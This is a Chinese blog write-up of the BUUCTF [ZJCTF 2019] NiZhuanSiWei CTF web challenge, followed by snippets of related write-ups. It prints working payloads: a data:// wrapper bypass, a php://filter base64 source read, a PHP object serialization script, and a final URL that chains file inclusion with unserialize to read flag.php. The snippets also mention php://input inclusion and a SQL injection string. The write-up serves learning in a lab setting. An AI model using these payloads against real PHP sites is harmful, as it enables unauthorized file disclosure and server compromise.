BUUCTF [ZJCTF 2019]NiZhuanSiWei 1解题思路

最新推荐文章于 2025-10-25 15:17:17 发布
原创 最新推荐文章于 2025-10-25 15:17:17 发布 · 1k 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #web安全 #密码学 #安全威胁分析 #系统安全

[ZJCTF 2019]NiZhuanSiWei 1

打开实例,发现为代码审计,确认为文件包含漏洞

在这里插入图片描述

需要三个参数text、file、password,首先是text验证,逻辑显示text必须有值,且读取文件内容得是welcome to the zjctf

采用读取本地文件绕过,在E盘新建文件

在这里插入图片描述

发现无效

在这里插入图片描述

尝试data流

?text=data://,welcome to the zjctf

在这里插入图片描述

成功绕过,接下来是file绕过,逻辑显示不能包含flag,注意到旁边注释useless.php,尝试读取页面内容

在这里插入图片描述

在这里插入图片描述

读取失败,尝试采用base64编码读取,读取成功

在这里插入图片描述

获得一串base64

PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo

解码为一段php代码

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

在这里插入图片描述

代码显示flag在flag.php中,此前注意到源代码的unserialize方法,那最后的password参数就是反序列化了

在这里插入图片描述

构造payload,注意到有__tostring方法,所以只要直接传flag.php字符串就行

<?php
class Flag{
    public $file = 'flag.php';
}
$select = new Flag();
$res=serialize(@$select);   
echo $res;

运行获得序列化字符串

O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述

运行,纳尼,没反应??

在这里插入图片描述

怀疑是与file的内容冲突了,把file改回来,显示成功

?text=data://,welcome%20to%20the%20zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述

发现flag没显示,查看源代码,发现flag

在这里插入图片描述

flag{8cfd1d3e-077f-48e6-aba4-07bde718c28b}
BUUCTF-[ZJCTF 2019]NiZhuanSiWei
lunan的博客
05-15 603
BUUCTF-[ZJCTF 2019]NiZhuanSiWei 一、知识点 1、php各种协议,data://,php:// payload构造: text=data://text/plain,welcome to the zjctf data协议解释:https://www.php.net/manual/zh/wrappers.data.php 2、文件包含 payload构造: file=php://filter/read=convert.base64-encode/resource=useless.
[ZJCTF 2019]NiZhuanSiWei - 伪协议+文件包含+反序列化
oZuoShen123的博客
10-09 1142
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "".file_get_contents($text,'r').""; if(preg_match("/flag/",$file)){ echo "Not now!"; exit(); }else{ include($file);
[ZJCTF 2019]NiZhuanSiWei
最新发布
ChangyuLee的博客
10-25 410
首先有三个get方式的参数text,file,password,先判定是否存在fileb并且file中的内容是否为“welcome to the zjctf”,如果是,则输出text中的内容;第三个参数password,在include(useless.php)之后,index.php中有了Flag类,因为有反序列化password那我们就将password设为一个Flag类,__tostring函数中有读取Flag类中file元素的函数。第二个参数file,index中给的提示很明显,
web buuctf [ZJCTF 2019]NiZhuanSiWei1
weixin_44214568的博客
03-14 1459
一共有三个参数,需要考虑传参,php传参,而且是text和file这样的值,基本可以考虑需要用php伪协议 , php伪协议是基于文件包含的,文件包含有本地包含和远程包含, 当包含的文件在远程服务器上时,就形成了远程文件包含。 远程文件包含需要在 php.ini 中设置: allow_url_include = on(是否允许 include/require 远程文件) allow_url_fopen = on(是否允许打开远程文件) php伪协议是php支持的协议和封装协议 贴(我从...
[ZJCTF 2019]NiZhuanSiWei 1
feng的博客
10-23 1572
知识点 文件包含与各种协议 反序列化 WP 首先进入环境,得到源码: $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r').
buuctf-[ZJCTF 2019]NiZhuanSiWei
Nothing-one的博客
11-04 470
打开之后我们就可以进行php的代码审计。我们从头开始看起。 在第一个if中我们就可以看到要满足里面的等式才可以看到file_get_contents()函数的功能是读取文件内容到一个字符串,但这里没没有一个文件,而是读取的text变量。没查到相关这方面的用法,特别是那个r参数。 这里我们如果直接将text与这段话进行等值那么我们就可以看到这个网站没有回显,也就是说我们要想办法绕过这个。 用php的伪协议也就是data://伪协议来进行漏洞利用。 这里也就说明了我绕过了。 然后我们再看下一个if语句。 因为.
web | CTF】BUUCTF [ZJCTF 2019]NiZhuanSiWei
weixin_46301214的博客
09-30 371
利用:是php中独有的一个协议,可以作为一个中间过滤器来处理目标数据流,可以进行任意文件的读取,且该协议的参数会在该协议路径上进行传递,多个参数都可以在一个路径上传递,相当于可构造多个过滤器。通俗一点讲就是,php://input作为被包含的参数时,也是文件包含,不过是包含的对象是post的数据,而post的数据为用户所传入,所以也相当于任意命令执行。直接 file=flag.php ,然后echo一下实例化的类,就完事了(忘记了上去看一下一开始的源码)有不一样的效果,有的是在注释,有的是直接显示到页面。
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解)
小宇的web博客
01-21 4380
buuctf-[ZJCTF 2019]NiZhuanSiWei 1(小宇特详解) 这里打开之后是一段源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".
BUUCTF [web专项24][ZJCTF 2019]NiZhuanSiWei
yanglinchiji的博客
11-06 314
注意:一定不要再用伪协议获得useless.php的base64编码内容了,而且还要指明文件是useless.php,否则会被顶掉内容。将其修改变量file后并添加输出后,进行序列化操作,再传输给password让其输出。还记得前面的截图吗,在后面会有一个反序列化操作,那么我们就可以利用该代码。获取结果后,将其传给password。3.这道题是有序列化和反序列化的。出现base64码,解码后,得到。1.需要给text传输一句话。进行正则匹配,禁止出现flag。接下来,尝试伪协议查看。参考他人wp后,发现。
BUUCTF [ZJCTF 2019]NiZhuanSiWei特详解(php伪协议+序列化与反序列化)
m0_55854679的博客
08-23 2196
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($te
BUUCTF [ZJCTF 2019]EasyHeap
BengDouLove的博客
04-08 2983
Partial RELRO 那说明got表可写,可以通过改写got表为想要的函数,堆通常的利用方法 还是老样子,一个堆块管理系统,main函数太长了不放了,就是根据你的输入选择操作 值得一提的是有个这个 这个函数能dedaoflag吗??一会再说,反正system是有了,不用泄露libc了 1.create 可以看到,堆块最多有十个,,还是用了一张表维护着堆块的指针,,这样就让人想把这个...
BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1
Zero_Adam的博客
02-07 313
BUUCTF:[ZJCTF 2019]NiZhuanSiWei 1 水文,给自己做点记录 这个简单,但是我没做出来,,辣鸡! 就是一个简单的伪协议的应用, 源码自己去看 没有做出来的原因 想PHP伪协议,没有想全 对文件包含不够敏感 就做到这一步,主要是useless.php我没用到啊,里面的flag在什么变量里面我也不知道,里面有什么类我也不清楚。。。 不行,看WP了,, --------------------------------------------------分割线-----------
BUUCTF [ZJCTF 2019]NiZhuanSiWei1
m0_73995922的博客
12-14 282
得到反序列化后结果O:4:"Flag":1:{s:4:"file";
[ZJCTF 2019]NiZhuanSiWei1
m0_73612768的博客
12-20 614
PHP伪协议的使用
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1322
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
BUUCTF
03-11
<think>好的,用户想要查找关于BUUCTF网络安全挑战赛的题目和解决方案。首先,我需要回顾用户提供的引用内容,看看是否有相关的信息。 引用[1]提到了注册账号、选择挑战场景、学习相关知识等步骤,但并没有具体题目或解决方案。引用[2]讨论了不同赛题类型的侧重点,比如PWN、Reverse、Crypto等,这对理解题目类型有帮助。引用[3]则是一个具体的Misc题目解析,涉及到NTFS数据流的处理,这可以作为解决方案的一个例子。 接下来,我需要根据这些信息,整理出BUUCTF常见的题目类型和对应的解决思路。例如,Web类可能需要SQL注入或XSS的知识,Crypto可能需要数学算法,Misc则可能涉及隐写术或数据恢复。然后,需要提供具体的解题步骤示例,比如引用[3]中的NTFS数据流题目,使用WinRAR和特定工具解决。 同时,用户可能希望了解如何系统地准备和解决这些题目,所以需要分步骤说明,比如注册、学习、解题方法等。另外,生成的相关问题要覆盖题目类型、学习资源、解题工具和比赛策略等方面,确保全面帮助用户。 最后,确保回答符合格式要求,使用正确的LaTeX语法,结构清晰,引用标识正确添加。还要检查是否有遗漏的信息,比如是否需要更多例子或更详细的步骤,确保用户能根据回答顺利找到题目解决方案。</think>### BUUCTF网络安全挑战赛题目类型与解决方案 BUUCTF网络安全竞赛题目覆盖Web安全密码学、逆向工程(PWN/Reverse)、隐写术(Misc)等领域。以下是常见题型及解决思路: --- #### 一、Web类题目 **典型题目**:SQL注入、XSS攻击、文件上传漏洞 **解决方案示例**: 1. 使用工具$sqlmap$自动化检测注入点[^1] 2. 构造Payload绕过过滤,例如:`admin' OR 1=1 -- ` 3. 利用浏览器开发者工具分析HTTP请求与响应 --- #### 二、Crypto类题目 **典型题目**:RSA加密、哈希碰撞、古典密码破译 **关键公式**: - RSA解密公式:$$m = c^d \mod n$$ **解决步骤**: 1. 分解公钥中的$n$值获取素数$p,q$ 2. 通过$d \equiv e^{-1} \mod \phi(n)$计算私钥 --- #### 三、Misc类题目 **案例参考**:[ACTF新生赛2020] NTFS数据流 **解决步骤**[^3]: 1. 使用$WinRAR$解压题目文件 2. 通过$NtfsStreamEditor2$工具提取隐藏数据流 3. 分析提取文件中的Flag信息 ```python # 示例:隐写术常用工具链 import binwalk binwalk.scan('target_file', signature=True) # 检测文件隐藏内容 ``` --- #### 四、Reverse/PWN类题目 **典型题目**:缓冲区溢出、Shellcode注入 **工具链**: - $GDB$调试器分析程序崩溃点 - $pwntools$编写自动化攻击脚本 --- ###
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TazmiDev

写文章不容易,充充电吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值